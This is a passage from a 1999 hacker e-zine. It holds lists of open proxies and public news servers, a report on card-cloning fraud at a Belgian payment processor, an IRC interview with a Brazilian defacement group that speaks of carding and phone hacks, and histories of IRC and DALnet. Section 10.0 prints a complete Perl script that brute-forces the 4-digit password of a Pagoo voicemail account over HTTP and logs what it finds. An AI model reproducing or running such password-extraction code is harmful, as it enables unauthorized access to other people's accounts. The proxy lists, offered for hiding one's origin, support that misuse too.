8080 WWW / FTP DK www-cache.net.uni-c.dk 3128 WWW / FTP EDU hermes.curry.edu 8080 WWW / FTP ES Softec linux.softec.es 8080 WWW / FTP FR cri.ens-lyon.fr 3128 WWW / FTP FR INFONIE proxy2.infonie.fr 80 WWW / FTP HR gita.srce.hr 80 WWW / FTP IL Goldnet goldcache.goldnet.net.il 80 WWW / FTP IS dyna0.islandia.is 8080 WWW / FTP IT colnuovo.iuss.unipv.it 80 WWW / FTP JP inet-sv.zenon.co.jp 8080 WWW / FTP JP ns.hiu.ac.jp 80 WWW / FTP JP Tokyo Uni kpcu.kumamoto-pct.ac.jp 8080 WWW / FTP KR Taegu biho.taegu.ac.kr 8080 WWW / FTP KR Kyunghee cvs2.kyunghee.ac.kr 8080 WWW / FTP LB data450.dm.net.lb 3128 WWW / FTP NET bright.net cacheflow.bright.net 8080 WWW / FTP NET Stargate Ind. cacheflow.tcg.sgi.net 8080 WWW / FTP NET BRASILNET magic.brasilnet.net 8080 WWW / FTP NET Global One gip-rjo-1-wc01.br.global-one.net 8080 WWW / FTP NG engine3.micro.com.ng 8080 WWW / FTP NL GelreVision webproxy.gelrevision.nl 80 WWW / FTP NO webcache1.globalone.no 80 WWW / FTP PH Info mail2.info.com.ph 3128 WWW / FTP PH electron2.msc.net.ph 3128 WWW / FTP PT Teleweb caclis01.teleweb.pt 3128 WWW / FTP QA Qatarnet proxy.qatar.net.qa 8080 WWW / FTP NetFilter RO lhab-gw.soroscj.ro 80 WWW / FTP RU adam.rosinkas.ru 80 WWW / FTP new SE Varnamo ns.varnamo.se 8080 WWW / FTP SG proxy1.tp.ac.sg 80 WWW / FTP new TR Turnet ankara3.turnet.net.tr 8080 WWW TW Golden club.golden.com.tw 8080 WWW TW IS c1.h202052106.is.net.tw 80 WWW / FTP UK poptel.net softy.poptel.org.uk 8080 WWW / FTP UK proxy1.cdesd.k12.or.us 80 WWW / FTP US K12 stpauls.pvt.k12.al.us 8080 WWW / FTP US cache.manistee-isd.k12.mi.us 80 WWW / FTP YE ? sah3.ye 80 WWW / FTP ZA M-Web proxy-rnb2.mweb.co.za 80 WWW / FTP ZA M-Web proxy.cpt.mweb.co.za 80 WWW / FTP ZW Cybergate proxy.cybergate.co.zw 8080 WWW / FTP down/busy ? ZW Africaonline proxy.africaonline.co.zw 8080 WWW / FTP (C) lp http://www.lightspeed.de/irc4all/ Telnettable Proxies ~~~~~~~~~~~~~~~~~~~ NotFound,200.36.19.225, NotFound,200.36.19.225, NotFound,206.103.12.131, NotFound,210.56.18.225, NotFound,210.56.18.226, NotFound,210.56.18.241, NotFound,200.248.68.129, NotFound,210.56.18.253, NotFound,200.248.69.50, noeljo9.lnk.telstra.net,139.130.54.153, modemcable215.2-200-24.hull.mc.videotron.net,24.200.2.215, edtn004203.hs.telusplanet.net,161.184.152.139, NotFound,195.14.148.98, blissr.lnk.telstra.net,139.130.54.131, PPP46-166.lvsb.vsnl.net.in,202.54.46.166, cr216724724.cable.net.co,216.72.47.24, cr216724718.cable.net.co,216.72.47.18, 122-94.w3.com.uy,207.3.122.94, saward.lnk.telstra.net,139.130.55.98, icqtwsrv1.maiowoo.com,203.135.240.3, NotFound,212.22.69.35, 122-85.w3.com.uy,207.3.122.85, gw.eudynelson.com,207.176.25.66, sis-zeus.sville.edu.ph,207.0.119.67, dns-server1.tj.pa.gov.br,200.242.244.1, theleu.lnk.telstra.net,139.130.74.160, 210-55-191-125.ipnets.xtra.co.nz,210.55.191.125, nor24788-1.gw.connect.com.au,202.21.13.46, NotFound,210.161.200.82, www.slcr.cz,212.27.210.65, NotFound,210.56.19.5, northeastmicro.com,204.170.187.254, NotFound,195.5.33.222, marina.amakusa.gr.jp,210.164.238.50, h0040053c7824.ne.mediaone.net,24.128.48.55, NotFound,216.72.45.152, tconl9076.tconl.com,204.26.90.76, NotFound,193.227.185.210, NotFound,194.243.99.199, NotFound,202.54.48.85, NotFound,200.21.157.61, server.goway.com,205.206.42.162, web.urudata.com.uy,207.3.122.84, cr2167248104.cable.net.co,216.72.48.104, frontier.netline.net.au,203.28.52.160, interate.com.pe,209.45.73.174, 210-55-191-126.ipnets.xtra.co.nz,210.55.191.126, com3058-2.gw.connect.com.au,202.21.8.108, PPP46-254.lvsb.vsnl.net.in,202.54.46.254, NotFound,195.14.148.99, ibp.santa.krs.ru,195.161.57.133, mail.theova.com,195.14.148.65, cr2167254143.cable.net.co,216.72.54.143, NotFound,142.250.6.2, plebiscito.synapsis.it,195.31.227.14, ipshome-gw.iwahashi.co.jp,210.164.242.146, other.issei-dc.co.jp,210.164.241.99, x1-6-00-60-b0-66-08-f7.cust.planetcable.net,24.137.18.44, NotFound,209.177.38.98, www.ymts.sakha.ru,194.186.182.2, mail.ermanco.com,12.2.82.130, mail1.bikesusa.com,207.176.25.114, ewwmail.ozemail.com.au,203.108.128.242, modemcable106.22-200-24.timi.mc.videotron.net,24.200.22.106, patter.lnk.telstra.net,139.130.81.160, server.hirup.khmelnitskiy.ua,195.230.134.227, port58151.btl.net,206.153.58.151, wdpcbalt.wdpc.com,208.222.211.65, dns.gincorp.co.jp,210.164.86.34, ts18.svamberk.cz,212.47.11.231, mail.coolmore.com.au,203.12.145.98, NotFound,195.14.148.101, cr216724770.cable.net.co,216.72.47.70, ip110.gte5.rb1.bel.nwlink.com,209.20.218.110, ci272608-a.sptnbrg1.sc.home.com,24.4.115.144, edsl78.mpls.uswest.net,209.181.225.79, NotFound,210.114.231.130, mooty.lnk.telstra.net,139.130.81.14, NotFound,168.187.78.34, NotFound,203.116.5.58, c111.h202052116.is.net.tw,202.52.116.111, cr2167251178.cable.net.co,216.72.51.178, altona.lnk.telstra.net,139.130.80.123, NotFound,139.130.59.187, nevisco.city.tvnet.hu,195.38.100.242, edtn003590.hs.telusplanet.net,161.184.150.34, NotFound,193.15.227.125, dns1.ctsjp.co.jp,210.172.87.146, gaon.zg.szczecin.pl,195.116.25.98, NotFound,195.5.33.218, edtn003331.hs.telusplanet.net,161.184.149.29, edtn003725.hs.telusplanet.net,161.184.150.169, dt027n36.san.rr.com,24.30.137.54, tsp-proxy.tsss.com,12.2.81.50, austra53.lnk.telstra.net,139.130.56.114, NotFound,195.161.69.65, modemcable118.21-200-24.timi.mc.videotron.net,24.200.21.118, cascad.lnk.telstra.net,139.130.44.197, edtn003171.hs.telusplanet.net,161.184.148.123, tob24399-1.gw.connect.com.au,202.21.14.234, ad112-162.magix.com.sg,165.21.112.162, NotFound,195.146.98.226, NotFound,193.232.250.133, lesy.vol.cz,212.27.211.5, HSE-Montreal-ppp32859.qc.sympatico.ca,216.209.195.103, north.ocs.k12.al.us,216.77.56.66, adsl-98.cais.com,207.176.4.98, modemcable161.21-200-24.timi.mc.videotron.net,24.200.21.161, NotFound,195.146.97.178, fsf.santa.krs.ru,195.161.57.178, HSE-Montreal-ppp32305.qc.sympatico.ca,216.209.193.57, ohs.ocs.k12.al.us,216.77.56.122, NotFound,195.14.148.100, carver.ocs.k12.al.us,216.77.56.114, oms.ocs.k12.al.us,216.77.56.106, C824154A.podernet.com.mx,200.36.21.74, NotFound,193.15.228.156, wingate.shokoren.or.jp,210.145.221.99, cpu1555.adsl.bellglobal.com,206.47.27.36, NotFound,195.14.148.97, expocom.dial-up.cz,193.85.249.31, edtn003655.hs.telusplanet.net,161.184.150.99, mb-kop-p2.mbusa.net,63.65.123.172, www.sos.iqnet.cz,212.71.157.102, jeter.ocs.k12.al.us,216.77.56.98, modemcable241.4-200-24.hull.mc.videotron.net,24.200.4.241, ip48.gte5.rb1.bel.nwlink.com,209.20.218.48, sai0103.erols.com,207.96.118.243, wforest.ocs.k12.al.us,216.77.56.82, 165-246.tr.cgocable.ca,24.226.165.246, morris.ocs.k12.al.us,216.77.56.74, ken9029.tsukuba.accs.or.jp,210.154.99.29, www.cassvillesd.k12.wi.us,216.56.42.3, ns.elaso.cz,195.146.96.178, proxy.wmisd.k12.mi.us,199.176.179.4, @HWA 04.0 Cyberarmy Proxies, Accounts and Wingates etc ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ More goodies although somewhat less reliable, these are from the lists at cyberarmy.com beware phishs, traps and plain bogus info mixed into the cruft. Unfortunately this section was unavailable in time for this issue due to server problems with cyberarmy.com. - Ed @HWA 05.0 Belgium: Security of Banksys compromised ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Contributed by Zym0t1c an HWA correspondant Sorry no URL provided -Ed Belgium: Security of Banksys compromised Unknown have succeeded into compromising the security of Banksys, the company who controles payterminals such as Bancontact and Mister Cash. By stealing a C-Zam payterminal at a gaz station these unknown captured a list of credit cards and their codes. With this info they were able to create fake credit cards. By using special equipment they copied this info on blank plastic cards. However, this story has two sides... Two days before the C-Zam payterminal was stolen, three hundred people already lost ten thousend Belgian francs, due to the use of fake credit cards. Youri Tolmatchov, spokesman of Banksys, thinks these unknown stole the terminal for disappearing possible evidence. The Public Prosecutor thinks these unknown may have used binoculars or cameras for monitoring used credit card codes. Then, creating the fake cards is rather simple. Every good electronics store offers 'special equipment' like card copiers. This trick was shown in a comic TV-show where two guys were able to copy information of credit cards by using a copier and a camera. The copies all worked perfectly. By the way, this Youri Tolmatchov is sort of accusing the two TV-guys for their 'bad example.' Banksys mentioned in a press conference the importance of using your secret code very discreetly. Incidents like these already took place in the past. One remarkable incident was last year in France where a ghost terminal, forged by experts, displayed 'out of use' and at the same time copied the card's info. The next generation credit cards are more secure because they're based on little computer chips which are very hard to copy. A question: why has Banksys not increased their security after that TV-incident two years ago? This is asking for troubles... @HWA 06.0 Public access mail servers ~~~~~~~~~~~~~~~~~~~~~~~~~~ Note: Not all newsgroups are available on all servers Server Name Groups Posting mailserver.corvis.ru 2405 Yes malun1.mala.bc.ca 5383 Yes enak.skif.net 6071 Yes news.orconet.com 17034 Yes valtan.sssp.mihara.hiroshima.jp 8541 Yes news.precisionet.net 27820 Yes 24.48.24.174 21760 Yes informer.hixnet.co.za 27127 Yes news.bezeqint.net 32330 Yes 223.176.100.5 25887 Yes news.cyberrealm.net 27827 Yes news.nasionet.net 29285 Yes system.nari-china.com 23611 Yes news.digicon.net 26894 Yes f400.n5020.z2.fidonet.org 2190 Yes (fido.* groups) magpie.cat.net.th 29833 Yes news.ku.ac.th 5315 No hc2.hci.net 20455 Yes news.usr.com 10463 Yes news.netzwerk2000.de 54395 Yes transcend.btrd.ab.ca 8052 Yes news1.simtel.ru 17737 Yes linux5.provincia.ps.it 4840 No hq005is.seccom.com.my 17462 Yes 203.37.240.72 24000+ Yes nntp.mmi.org 12277 Yes 206.97.174.98 32461 Yes nntp1.sen.ca.gov 27608 Yes fastnet-cache.disctronics.co.uk 22807 Yes delphi.bc.edu 4062 No 203.41.190.130 22378 Yes news.ochin.on.ca 20113 Yes linux.lanetixx.de 7836 Yes 205.253.48.9 37121 Yes 207.227.203.4 45729 No octopussy.berlin.detecon.de 2585 Yes news.fcu.edu.tw 15156 No 208.128.255.6 27820 Yes news.phys.uu.nl 9052 No anode.phelpsd.com 3754 Yes plato.devnull.tzo.net 23133 Yes promoting.net 11406 No news.phys.uu.nl 9212 No news.icq.com 65 Yes (ICQ groups) mail.advis.de 12812 Yes 24.112.33.188 31327 Yes 206.243.175.108 7554 Yes news.digitalfoundry.com 3102 Yes Plus many more, check out http://www.serverseekers.com/new.html for a complete list and more details. - Ed @HWA 07.0 Santa Claus about to lose his domain for nonpayment? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This was forwarded by another disgruntled elf (not the same one that lost his job at Santa's workshop last year who forwarded us his credit report)...seems Santa is feeling the crunch this year. Date DEC-1-, 1999 Domain Name: Santasworkshop.com Invoice Number: 313370 Amount Due: $70.00 US Dollars This letter s being sent as a courtesy to advise that our records show payment for the domain name referenced above has not been received, surely a fat rich fuck like yourself can afford a domain name?. Our records show that the following person has been designated as the Billing Contact for the domain name in question. Elfadmin Admin, Elf Santa's Workshop POBOX H0H0H0 North Pole Santa@santasworkshop.com If you beleive that the payment and this notice may have crossed sleigh paths please verify the payment status by calling (888) 771-3000 from the U.S, Canada Peurto Rico and the U.S Virgin Islands. From other locations call (402) 496-9798 If payment is not received within 10 days from the date of this notice, domain name service will be discontinued or one of your reindeer may be taken in leiu of payment. Poor Santa... dire straits again... - Ed @HWA 08.0 Interview with NFO (Nine Forty One Group) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ NFO is a Brazilian hacking group that has been around for nearly a year I caught up with one of the members on IRC and he agreed to a short interview with me, so here's a peek into the mind of another hacker/cracker. Their website is : http://www.self-evident.com/nfo/ check it out, they also list a few recent hacks on the page... Interview start (Slightly edited to remove personal chit chat otherwise verbatim) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Session Start: Fri Dec 24 15:33:53 1999 [15:33] i'm nfo member [15:33] www.self-evident.com/nfo you be on in a while? under this nick? [15:34] now yes ok ttyiab gotta finish something up join #hwa.hax0r.news and idle if u want bbiab what does NFO stand for? just like it sounds? "info" ? [15:40] no hack group [15:40] we meet and hack what does NFO stand for though? the group name? can I interview you for the zine? [15:40] nfo=ninefortyone [15:41] now? sure won't take long [15:41] ok [15:41] start How long has NFO been around as a group and how many members do you have? [15:42] 6 months, 6 members [15:42] fickerguy, sysdenial, codak, thms, grafspee, vetesgirl sorry was interrupted do you deface websites or hack for access only? I see some sites listed on your page [15:46] in the begging we were defacing a lot of brazilian government sites and some brazilians tv channels sites in brazil only cause we are brazilian except vetesgirl ok you are located in Brazil? [15:46] but after globo tv channels we decided to don't deface websites anymore cause in brazil only stupids are defecing sites nowadays [15:47] yes 5 of us what is your opinion on the 'scene' today? [15:47] what do u mean? how r we on the scene? what do you think about the other people in the scene? general feelings [15:48] they r all assholes [15:48] as we are good answer ;) [15:48] heh we make groups and code to change with them and that's all :) do you write your own exploits? [15:48] no i don't would you call yourselves scriptkiddies then? [15:49] i do tools to use them heh [15:49] graf does ok [15:49] graf writes exploit [15:49] as vetes and sys lots of skills and backdoors [15:49] skills/tools what are the ages of the members in the group? like oldest and youngest? [15:50] i dunno exactly i think thms is 18, codak 16 or 17, graf and sys older, more than 23 and vetes i forgot heh more than 30 iam 15 do you stay in contact off IRC or exclusively online? like telephone etc [15:51] we 5 ( brazilians ) keep contact out of irc.. i mean telephone ok do you phreak too? [15:52] no, all i do is that stuff with some wire in public phones and carding with some international phone cards have any of your group or yourself ever been raided or afraid you might be? [15:53] i've been [15:53] i dunno about them by who? which agency? [15:53] i hacked main computers in telemar ( brazilian telephone company ) and they come my home was the FBI involved? i've heard of the FBI acting outside of the US lately with Interpol in busts [15:54] other time brazilian feds got me so Telephone Security personnel? [15:54] no what were the consequences? [15:54] with the feds i got in court and telemar we made an agreement cash settlement? [15:55] in the court as i was too young and a lot of talk they just asked me to don't do it anymore [15:55] and with telemar lucky [15:55] i told them how i hacked them [15:55] and they forgive me do you ever help out other admins after you've hacked their sites or patch holes you find? [15:56] yes i did ok any last words you'd like to say? [15:57] *** duro (duro@pm2-balt-98.qis.net) invites you to join #fawkerz [15:57] don't be a cow just hacking like a cow eat a lot of bullshit networks like a universtity in the end of the hell, hack cool stuff ok anything else? any greets? :) [15:58] greets to my mother, father, brother, nfo members and specialy for you HEHEH [15:58] j/k hehe ok thanks for the interview i'll put it in issue #48 [15:59] ok thank u for the enjoying time [15:59] i'll travel tonight [15:59] we talk next week [15:59] see ya cya Session Close: Fri Dec 24 15:59:42 1999 @HWA 09.0 The history of IRC (Internet Relay Chat) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This is here coz I had a discussion on which IRC network came first and was told Dalnet was before EFnet which I knew was wrong but it got me to thinking not many people know the real stories of the networks they are using so here's a couple of files on EFNet and DALNET for your edification and enlightenment - Ed ***NOTE! IF ANYONE has any info on BRC (Bitnet Relay Chat) I'd be VERY appreciative if you could email the info or point me in the direction of information on this predecessor to IRC mail to cruciphux@dok.org tnx! Source: http://www.the-project.org/history.html Early IRC history Dates by Ian, comments by Helen (this is a very rough cut) Send additions/corrections to frechett@colorado.edu summer 1988 - irc2.0 released this is Jarkko's tale of the releasing of irc: From jto@rieska.oulu.fi Fri Dec 10 18:23:37 1993 Date: Fri, 10 Dec 93 14:46:17 +0200 From: jto@rieska.oulu.fi (Jarkko Oikarinen) To: hrose@eff.org Subject: IRC History... Content-Length: 3752 Included is a history of IRC as I wrote maybe 3 or 4 years ago. Hope it helps! I don't know if this helps much. I hope I remember things correctly and apologise people whom I have left out and they had deserved to be in here. I was working in the Department of Information Processing Science in University of Oulu during summer'88. I guess they didn't have much for me to do. I was administring the department's sun server, but it didn't take all time. So I started doing a communications program, which was meant to make OuluBox (a Public Access BBS running on host tolsun.oulu.fi, administered by me) a little more usable. The purpose was to allow USENET News-kind of discussion and groups there in addition to real time discussions and other BBS related stuff. Jyrki Kuoppala (jkp@cs.hut.fi) had implemented rmsg program for sending messages to people on other machines. It didn't have the channel concept implemented (though it supported it), so it was mainly used for person-to-person communications. Another already existing simple multiuser chat program on OuluBox was MUT (MultiUser Talk), it was written by Jukka Pihl (pihl@rieska.oulu.fi). That program has a bad habit of not working properly, so in order to fix this, the first implemented thing of this BBS plan was IRC. The birthday of IRC was in August 1988. The exact date is unknown, at the end of the month anyways. Bitnet Relay Chat was a good inspiration for IRC. When IRC started occasionally having more than 10 users, I asked some friends of mine to start running irc servers in south Finland, mainly in Tampere University of Technology and Helsinki University of Technology. Some other universities soon followed. Markku J{rvinen (mta@cc.tut.fi) improved the irc client (there was only one at that time) to support some emacs editing commands. At that time it was obvious that adding BBS like functions to the program was not a good idea, it's better to have one program for one purpose. So the BBS extension idea was given up and just IRC stayed. IRC was well spread in Finland. I contacted some friends of mine through BITNET Relay and asked if they would try this program. Internet connections did not yet work from Finland to other countries, so they could not connect to the Finnish network (which I suppose was the reason for them not being very enthusiastic about irc). Internet connections to states started working (I don't anymore remember when). I answered to some news articles where people asked for multiuser chat programs. I didn't get replies. At mit, there was the legendary ai.ai.mit.edu machine running ITS. I got an account there and learned to use it a little bit. Enough to know how to chat with people. From there I got the first IRC user outside Scandinavia, Mike Jacobs used IRC through OuluBox (he did not have account on any Unix machines). Through ai.ai.mit.edu I got to know Vijay Subramaniam (I hope I spelled that correctly :-). I had given IRC to him and not heard of him for some time. Then I got mail messages from Jeff Trim (used to be jtrim@orion.cair.du.edu, University of Denver, current address unknown) David Bleckmann (bleckmd@jacobs.cs.orst.edu) and Todd Ferguson (melvin@jacobs.cs.orst.edu, Oregon State University). Vijay had given IRC to them and they had started ircd on their machines (orion.cair.du.edu and jacobcs.cs.orst.edu, if I remember correctly) and wanted to connect to Finnish irc network. After that some other people started running IRC, and the number of servers grew quickly. The first IRC server (and still running) was tolsun.oulu.fi I have no idea of the latest one.. Aug 88 - first irc server tolsun.oulu.fi 89 - ircII released by Michael Sandrof (BigCheese) Mar 90 - 2.2msa4 Jun 90 - 2.5beta ("+" named channels) Jun 90 - ircII 1.90a Jul 90 - 12 users on 38 servers Aug 90 - IRC splits into EFnet (Eris Free) and Anet (Anarchy) Sep 90 - 117 servers Sep 90 - 41 users 86 servers Nov 90 - version 2.6 released Dec 90 - ircII 2.0beta10 late 90 - Darren Reed (Avalon) adds hash tables when IRC stops under load xxxx 91 - Troy Rollo (Troy) takes over ircII development Jan 91 - The Gulf war.. usage goes from peak 100 to peak 300 Jan 91 - version 2.6.1 adds flow control.. Feb 91 - bandwidth NSF stats record 8.8 Gigs for month of Feb Mar 91 - NSF is all T1 Mar 91 - 2.6pre18 (famous for running on services.de long after 2.7 release) Mar 91 - bandwidth 200k/2 hours Mar 91 - 135 servers 69 us 66 non us Apr 91 - 240 users median Jun 91 - Cori booted off Jul 91 - The.PLAN Aug 91 - ircII 2.1.3 Oct 91 - 399 users 120 servers 44 opers (hits 500) Nov 91 - ircII 2.1.5pre3 Sum 92 - ICMP attacks (cert advisory July 92) Jan 93 - Matthew Green (phone) takes over ircII development xxxx 94 - irc.colorado.edu hits 1000 users late 94 - IRC hits 5,000 users mid 95 - irc.escape.com hits 2000 users Oct 95 - IRC hits 15,000 users Feb 96 - Possibly largest channel ever. Id releases Qtest. #Quake sees 1556 users May 96 - Europe and the US EFnet splits into two separate networks as a result of a disagreement on whether the network should use TS or Nick Delay as a means to prevent nick collisions. Apr 97 - IRC hits 30,000 users Jun 97 - irc-e.primenet.com and irc1.phoenix.net both break 3000 clients Oct 97 - "smurf.c" - multi-broadcast ICMP attack posted to Bugtraq Denial of Service attacks on EFnet servers hit an all-time high Jan 98 - IRC hits 40,000 users Mar 98 - irc.blackened.com breaks 4000 clients Apr 98 - irc.blackened.com breaks 5000 clients May 98 - irc.blackened.com breaks 6000 clients Jun 98 - irc.blackened.com breaks 7000 clients Sep 98 - irc.blackened.com breaks 8000 clients Feb 99 - irc.idle.net breaks 9000 clients Feb 99 - irc.idle.net breaks 10000 clients Feb 99 - IRC hits 50,000 users Jul 99 - irc.freei.net breaks 11000 clients Aug 99 - irc.concentric.net breaks 12000 clients Aug 99 - irc.concentric.net breaks 13000 clients Nov 99 - EFnet breaks 60,000 clients Nov 99 - irc.core.com breaks 14000 clients Dec 99 - irc.core.com breaks 15000 clients Dec 99 - irc.core.com breaks 16000 clients Need dates for - IRC gets 10 servers see my note above from Jarkko - IRC gets 100 servers the very first time it was done was May 1990, but it soon dropped down again. It was before the split and anyone could set up a server so we set up a few on machines at UC to bring the total up to 100 :-) [before EFnet/Anet] - IRC gets 200 servers (it has been over 200.. but has dropped since) - irc2.4 (numeric only channels) here's a bit of history... I first started using irc in January or February of 1990. At the time the latest server revs were 2.2PL0 and 2.2PL1. msa and Chelsea Ashley Dyerman were working on the 2.3 release ... there was a disagreement between them about the copyrights. Chelsea had everything copyrighted by the IRCDC (IRC Development Consortium). People told her they didn't like that, it should be GPL'ed. She released 2.3alpha with those copyrights. Very few sites ran it as it didn't offer much over 2.2PL1. At the same time, msa was doing his own work. He added very handy things like /whowas, nick chase kill, wallops (later removed), and remote /away propogation. He had several releases, the most stable being 2.2msa4 and 2.2msa9. 2.2msa10 eventually turned into 2.4 (2.3 was "tainted" by Chelsea). Jarkko came along and did a bit of cleanup on 2.4 (which was stable in and of itself) and released 2.4.1. - irc2.5 Armin did 2.5 alpha, and then Jarkko took it over, with his idiotic 2.5+ release. msa (I believe) did 2.5.1 ... then Tom Hopkins and some other BU folks (myself included) collaborated on 2.5.1.bu.10, possibly the most stable server version to date :-) No new features went into 2.5.1.bu.10 (also called 2.5.2 in the docs, but it was never released as such), just bug fixes. I wish we did that nowadays :-) - irc2.6 + channels (still have numerics) # channels added later on Armin started the 2.6 release and then Avalon took it over. - irc2.7 # channels replace + channels and numerics go away forever 2.7 was a nice cleanup release. People tried to do things a bit more by the book. ircd was put through a saber C check (and bullied into compliance :-) Bans were added to the server in 2.7. In 2.6 you could kick a user out but had to rekick or go +i to stop them from rejoining. - irc2.8 & channels.. - irc2.9 + channels are back, sorta Read the operlist archives on ftp.kei.com:/pub/irc/mailing-lists USBIC, planned in 1993, never passed. Again, more archives on ftp.kei.com:/pub/irc Again, I really suggest you look at the operlist and irclist archives on ftp.kei.com:/pub/irc/mailing-lists -- it covers most of these issues. - WALLOPS removed Again, the dates should be in the archives - MODES added modes were added with + channels. -=- Source: http://www.dalnet.com/ DALNET History file The History of IRC September 1999 Contents 1. Some information on IRC 2. Some information on DALnet 3. Looking to the future 1. Some Info on IRC IRC or Internet Relay Chat was originally written by Jarkko Oikarinen in the year 1988. Since it's birth in Finland, IRC is in use in over sixty countries worldwide. IRC was originally designed as a replacement for a program called "Talk". "What is IRC?" you may ask. IRC is a multi-user chat system that connects 'servers' around the world by means of a 'cable' of sorts. These servers form a gigantic web that allows you to connect to a given server. You can then join 'chat rooms' or 'channels' that don't really exist. They are virtual meeting halls of sorts. This allows anyone with an internet connection to participate in live chat. IRC is a constantly evolving machine. New changes are made to the IRCd (Internet Relay Chat Daemon or server program) that make your IRC experience all the more enjoyable. DALnet coders have recently created a new IRCd, Bahamut, which enables servers to run faster and more efficiently. You can get more information at http://www.bahamut.net. During IRC's relativly short history it has quickly shown it's superiority over other chat systems like those owned by America On Line. This is because of several reasons. Firstly, IRC is free. There is no charge to use IRC or DALnet and there are no prerequisets to join. Internet Relay Chat was propelled into the spotlight during the gulf war in 1991. During this period information was relayed from around the world. Family's could communicate from thousands of miles away. IRC was a meeting place and an information clearinghouse for those who needed information that was both up to date and reliable. IRC has also been used during the Los Angeles Riots, the bombings in Israel,the Presidential Elections in the United States, and of course, Monica Lewinsky's deposition. Logs of these chats are available if you click here. The DALnet IRC Network believes strongly in free speech and freedom unless United States Federal Law or worldwide law is broken. As will be stated below, IRC is supported by individuals who gain no profit from their support of IRC (ISPs excepted).Therefore, many IRC networks including DALnet do not allow the trading of illegal software or 'warez' or the so called 'kiddy-porn.' At this time DALnet has about 40,000 users and forty-two servers worldwide. It is important to remember that Internet Relay Chat is free and is supported not by a conglomerate company but by a small group of generous ISPs (Internet Service Providers), Admins (Server Administrators) and IRCops (IRC Operators). None of these people are paid for their support and generously provide a safe environment for you, the user. 2. Information on DALnet The DALnet IRC Network was created as a replacement for the troubled EFnet (Eris Free Net) and Undernet IRC Networks. EFnet has over ffity-thousand users and eight thousand active channels. This is the largest of the IRC Networks but it does have many troubling downsides. EFnet is also one of the slowest networks. There is usually tremendous lag time because of overwhelming users, bad server routing and connections and also hacking. EFnet has hundreds of servers but has frequent NetSplits and thus needed to be replaced by something more efficient. From this the Undernet was born. Undernet, though smaller, has servers in the United States, Canada, Australia and in Europe. The Undernet attempted to do away with the high consumption of bandwidth and channel chaos that was created by a large number of users running bots (programs that perform a certain task). These bots were usually intended to protect channels from takeovers or were used to takeover channels themselves. The Undernet offered the CService-a program that allowed users with W or X type bots to register channels and protect them from troublemakers. The Undernet hit major stumbling blocks in the areas of customer services and care, but the one area of service that the Undernet excelled at was in innovations. The Undernet allowed for new commands to be installed in the IRCd and new channel modes to be used. It also allowed for greater security for channels and channel modes aswell as users. The summer of the year 1994 dawned a new age for the users of Internet Relay Chat. During this time the DALnet IRC Network was formed using a modified version of the Undernet IRCd. This IRCd was edited cheifly by Alexei "Lefler" Kosut. Some of the innovations included: global WallOps (IRCop messages that can be seen by users who are +w (/mode NickName +w)), longer nicknames, Q:Lined nicknames (nicknames that cannot be used i.e. ChanServ, IRCop, NickServ, etc.), global K:Lines (ban of one person or an entire domain from a server or the entire network), IRCop only communications: GlobOps, +H mode showing that an IRCop is a HelpOp also and many, many, many more features. DALnet's unique services were originally coded in early 1995 by Brian "Morpher" Smith and allow users to own nicknames, channels, send memos and do much, much more. These services are superior to the X and W bots because they are omnipotent and invisably reside in every channel. Because of this channel bots are not needed. ChanServ's automatic channel registration eliminates the lengthy processes of Undernet while still being extremely easy to use and also very secure. DALnet also provides users with the ability to 'own' one's NickName. The /nickserv register PASSWORD command is all that is needed to own your own nickname an ensure that it is always there for you when you come online Note: PASSWORD is your own password that you MUST remember or write down for future use). DALnet users can also send Post-It type 'memos' to eachother if both user's nicknames are registered. More info on services is available on their pages. Many servers have linked to and parted from DALnet in the few years that it has existed. Some have left due to bandwidth problems, Internet Service Provider problems, interpersonal problems, and other reasons. 3. Looking to the future DALnet continues to grow. It's user count has rocketed from around 30,000 at the beginning of 1999 to 45,000 during the Summer. DALnet's extensive and well developed help system, whereby a person has a large number of 'recommended' channels and other resources at their fingertips, continues to go from strength to strength. Among the current innovations are freshly coded services which allow users to gain full potential from nickname and channel registration and the new IRCd (http://www.bahamut.net) to ensure a quick, worry-free connection. DALnet's staff are still the pride of the network; users can join #OperHelp for speedy assistance from an IRCop, and you'll always be assured of a smiling, helping hand when you need it. Some information contributed by: nelgin, Sentinele, dalvenjah, WebMaster, blofeld and the_saviour. @HWA 10.0 Pagoo Internet voice MailBox by Loophole/HHP ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Source: Loophole #!/usr/bin/perl # # (hhp) hhp-pagoo.pl (hhp) # by: LoopHole of the hhp. # http://hhp.hemp.net/ # 6/25/99 # # The (Pagoo Internet voice MailBox) exploit. # Available at http://www.pagoo.com/ # # This exploit will extract the password to # the specified PagooID you specify. # # The vulnerability comes into play when you # connect to your UpdateForm thru signup.asp # which requires your PagooID and your 4 # digit password. # # Nothing will prevent you from reconnecting # and trying a new password from 0000 in # increments of 1 till we reach 9999 which # is the highest password possible... I # could call this a brute, but it always # 100% of the time will get the passwd # unlike a brute. # # Logs passwds to file: pagooids use IO::Socket; die "usage: $0 \n" unless(@ARGV == 1); ($box) = (@ARGV); open OUT, ">>pagooids" or die "Can't open temp file -> .pagoo\n"; autoflush OUT 1; $host = "www.pagoo.com"; autoflush STDOUT 1; sub parse { ($num) = @_; $url = "/asp/signup/signup.asp?Service=UpdateForm&PagooID=$box&Password=$num"; $socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => 80, Proto => "tcp") or die "Can't connect.\n"; print $socket "GET $url\n"; print "Trying password: $num of 9999.\n"; while(<$socket>) { chomp; if(/Password invalid/) { break; } if(/First Name/) { print "PagooID password extracted...\n"; print "PagooID: $box / Password: $num\n"; print OUT "PagooID: $box / Password: $num\n"; exit 0; } } } $num = '0000'; parse $num; for($i = 0; $i <= 9999; $i++) { $num++; parse $num; } @HWA 11.0 HNN: The Year in Review 1999 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ Note: Check the url for relative links included in the text. - Ed Page 1 Nineteen Ninety Nine was an exciting year that saw explosive growth 